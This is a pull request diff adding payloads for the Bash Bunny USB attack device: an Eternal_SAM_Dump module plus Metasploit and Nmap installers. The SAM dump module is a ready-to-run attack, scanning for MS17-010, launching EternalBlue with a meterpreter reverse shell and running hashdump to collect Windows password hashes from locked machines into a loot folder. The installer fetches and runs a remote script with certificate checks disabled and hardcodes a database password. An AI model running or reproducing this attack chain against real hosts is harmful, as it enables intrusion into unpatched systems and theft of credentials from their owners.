### PR TITLE
Eternal_SAM_Dump, Metasploit_Installer, Nmap_Installer

### DIFF
--- a/payloads/library/exploitation/Eternal_SAM_dump/dump.rc
+++ b/payloads/library/exploitation/Eternal_SAM_dump/dump.rc
@@ -1,0 +1,7 @@
+use exploit/windows/smb/ms17_010_eternalblue
+set PAYLOAD windows/x64/meterpreter/reverse_tcp
+set RHOST 172.16.64.64
+set LHOST 172.16.64.1
+set AutoRunScript post.rc
+spool /root/sam_dump.txt
+exploit

--- a/payloads/library/exploitation/Eternal_SAM_dump/payload.txt
+++ b/payloads/library/exploitation/Eternal_SAM_dump/payload.txt
@@ -1,0 +1,51 @@
+#!/bin/bash
+#
+# Title:         Eternal_SAM_Dump
+# Author:        golem445
+# Version:       1.0
+# Dependencies:  Metasploit, Nmap 7.70+
+# Runtime:		 3+ minutes
+# Tested OS's:   Windows 7, Windows 2008
+#
+# This module first tests if a host is vulnerable to MS17-010. If
+# patched, the LED will turn red. If vulnerable, a blue light will
+# flash and the module will dump the SAM regardless if the machine
+# is locked. SAM hashes are then exported to the loot directory.
+
+LED SETUP 
+ATTACKMODE RNDIS_ETHERNET 
+GET SWITCH_POSITION
+LOOTDIR=/root/udisk/loot/
+HOST=${TARGET_HOSTNAME}
+mkdir -p $LOOTDIR
+
+# Check if host is vulnerable to ms17-010
+LED ATTACK
+cd /root/
+nmap -v -p445 -Pn -n --script smb-vuln-ms17-010.nse 172.16.64.64 -oX patch.txt
+
+# If host isn't vulnerable, we clean up and quit. If successful, run the attack
+if [ "$(ls -A /root/)" ]; then
+    if grep "is patched." /root/*.txt; then
+       rm -rf /root/patch.txt
+	   LED FAIL
+    else
+       # Attack
+	   LED C SLOW
+	   rm -rf /root/patch.txt
+	   cd /root/udisk/payloads/$SWITCH_POSITION/
+	   msfconsole -r dump.rc
+	   
+	   # Cleanup 
+	   # If hostname is blank, set to "noname"
+       [[ -z "$HOST" ]] && HOST="unknown"
+       COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l)
+       COUNT=$((COUNT+1))
+       mkdir -p $LOOTDIR/$HOST-$COUNT
+       cat /root/sam_dump.txt | grep ::: > $LOOTDIR/$HOST-$COUNT/sam_dump.txt
+       rm /root/sam_dump.txt
+	   
+	   # Done
+	   LED FINISH
+    fi
+fi

--- a/payloads/library/exploitation/Eternal_SAM_dump/post.rc
+++ b/payloads/library/exploitation/Eternal_SAM_dump/post.rc
@@ -1,0 +1,1 @@
+run post/windows/gather/hashdump

--- a/payloads/library/exploitation/Eternal_SAM_dump/readme.md
+++ b/payloads/library/exploitation/Eternal_SAM_dump/readme.md
@@ -1,0 +1,27 @@
+# Eternal_SAM_Dump
+* Author: golem445
+* Version: 1.0
+* Target: Windows 7, Windows 2008
+
+## Description
+
+This module first tests if a host is vulnerable to MS17-010. If patched, the LED will
+turn red. If vulnerable, a blue light will flash and the module will dump the SAM
+regardless if the machine is locked. SAM hashes are then exported to the loot directory.
+
+## Requirements
+
+Metaspsloit and Nmap 7.70+ should be installed
+
+## STATUS
+
+| Status              | Description                              |
+| ------------------- | ---------------------------------------- |
+| Solid Violet        | Setup for attack                         |
+| Flashing Red        | Host is patched against MS17-010         |
+| Flashing Cyan       | Appears vulnerable, attack in progress   |
+| Solid Green         | Attack complete                          |
+
+## Credits
+
+* zerosum0x0 for his work on the Eternalblue Metasploit module

--- a/payloads/library/general/Metasploit_Installer/msfdb.sh
+++ b/payloads/library/general/Metasploit_Installer/msfdb.sh
@@ -1,0 +1,43 @@
+#!/bin/bash
+
+cat <<EOF> /opt/pg-utf8.sql
+update pg_database set datallowconn = TRUE where datname = 'template0';
+\c template0
+update pg_database set datistemplate = FALSE where datname = 'template1';
+drop database template1;
+create database template1 with template = template0 encoding = 'UTF8';
+update pg_database set datistemplate = TRUE where datname = 'template1';
+\c template1
+update pg_database set datallowconn = FALSE where datname = 'template0';
+\q
+EOF
+postgres psql -f /opt/pg-utf8.sql &&
+postgres createuser msfdev -dRS &&
+postgres psql -c \
+  "ALTER USER msfdev with ENCRYPTED PASSWORD 'RedvsBlue';" &&
+postgres createdb --owner msfdev msf_dev_db &&
+postgres createdb --owner msfdev msf_test_db &&
+cat <<EOF> /opt/database.yml
+
+# Development Database
+development: &pgsql
+  adapter: postgresql
+  database: msf_dev_db
+  username: msfdev
+  password: RedvsBlue
+  host: localhost
+  port: 5432
+  pool: 5
+  timeout: 5
+
+# Production database -- same as dev
+production: &production
+  <<: *pgsql
+
+# Test database -- not the same, since it gets dropped all the time
+test:
+  <<: *pgsql
+  database: msf_test_db
+EOF
+# echo "Manually move /opt/database.yml to $HOME/.msf4/database.yml"
+

--- a/payloads/library/general/Metasploit_Installer/payload.txt
+++ b/payloads/library/general/Metasploit_Installer/payload.txt
@@ -1,0 +1,47 @@
+#!/bin/bash
+#
+# Title:         Metasploit_Installer
+# Author:        golem445
+# Version:       1.0
+# Dependencies:  Internet Connection Sharing enabled
+#
+# Sets up an Ethernet interface, then proceeds
+# to install Metasploit on the Bash Bunny using
+# a re-engineered Pentesters Framework script
+
+## Get setup
+LED SETUP 
+ATTACKMODE RNDIS_ETHERNET 
+GET SWITCH_POSITION
+
+# Install dependencies
+apt-get update -y
+apt-get install -y autoconf bison build-essential curl git-core libapr1 libaprutil1 libcurl4-openssl-dev libgmp3-dev libpcap-dev libpq-dev libreadline6-dev libsqlite3-dev libssl-dev libsvn1 libtool libxml2 libxml2-dev libxslt-dev libyaml-dev locate ncurses-dev openssl postgresql postgresql-contrib wget xsel zlib1g zlib1g-dev
+
+# Prep for and retrieve Metasploit files
+cd /root/
+date -s '20180518'
+wget -O - https://apt.metasploit.com/metasploit-framework.gpg.key | apt-key add -
+curl -k -A "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30" https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb -o msfinstall
+chmod 755 msfinstall
+
+## Install Metasploit
+LED ATTACK
+./msfinstall
+update-rc.d postgresql enable
+cp /root/udisk/payloads/$SWITCH_POSITION/msfdb.sh /root/metasploit/
+chmod +x msfdb.sh
+sh msfdb.sh
+mkdir /root/.msf4
+cp /opt/database.yml /root/.msf4/
+
+# Cleanup 
+rm -rf /root/metasploit/
+rm -rf /usr/local/bin/msf*
+rm msfinstall
+
+# Sync the file system
+sync
+
+## Finished
+LED FINISH

--- a/payloads/library/general/Metasploit_Installer/readme.md
+++ b/payloads/library/general/Metasploit_Installer/readme.md
@@ -1,0 +1,26 @@
+# Metasploit_Installer
+* Author: golem445
+* Version: 1.0
+
+## Description
+
+Sets up an Ethernet interface, then proceeds to install Metasploit
+on the Bash Bunny using a re-engineered Pentesters Framework script
+
+## Requirements
+
+Internet Connection Sharing should be enabled to the Bash Bunny
+(See the hak5 wiki at https://wiki.bashbunny.com/#!index.md for
+additional guidance)
+
+## STATUS
+
+| Status              | Description                              |
+| ------------------- | ---------------------------------------- |
+| Solid Violet        | Setup for install                        |
+| Flashing Amber      | Installing Metasploit                    |
+| Solid Green         | Installation complete                    |
+
+## Credits
+
+* David Kennedy (ReL1K) - For creating the original PTF script

--- a/payloads/library/general/Nmap_Installer/payload.txt
+++ b/payloads/library/general/Nmap_Installer/payload.txt
@@ -1,0 +1,35 @@
+#!/bin/bash
+#
+# Title:         Nmap_Installer
+# Author:        golem445
+# Version:       1.0
+# Dependencies:  Internet Connection Sharing enabled
+#
+# Installs the latest Nmap via subversion
+
+## Get setup
+LED SETUP 
+ATTACKMODE RNDIS_ETHERNET 
+
+# Install dependencies
+apt-get update -y
+apt-get install subversion autoconf build-essential libssl-dev
+
+## Install Nmap
+LED ATTACK
+cd /root/
+svn co https://svn.nmap.org/nmap/
+cd nmap
+./configure
+make
+make install
+
+# Cleanup 
+cd /root/
+rm -rf nmap
+
+# Sync the file system
+sync
+
+## Finished
+LED FINISH

--- a/payloads/library/general/Nmap_Installer/readme.md
+++ b/payloads/library/general/Nmap_Installer/readme.md
@@ -1,0 +1,21 @@
+# Nmap_Installer
+* Author: golem445
+* Version: 1.0
+
+## Description
+
+Sets up Ethernet, then proceeds to install the latest Nmap via subversion
+
+## Requirements
+
+Internet Connection Sharing should be enabled to the Bash Bunny
+(See the hak5 wiki at https://wiki.bashbunny.com/#!index.md for
+additional guidance)
+
+## STATUS
+
+| Status              | Description                              |
+| ------------------- | ---------------------------------------- |
+| Solid Violet        | Setup for install                        |
+| Flashing Amber      | Installing Nmap                          |
+| Solid Green         | Installation complete                    |


### PR DESCRIPTION
Eternal_SAM_Dump leverages Eternalblue (ms17-010) to dump the hosts SAM, regardless if host is locked, to the BB loot folder.
Metasploit_Installer installs Metasploit to the Bash Bunny, and Nmap_Installer installs/updates Nmap.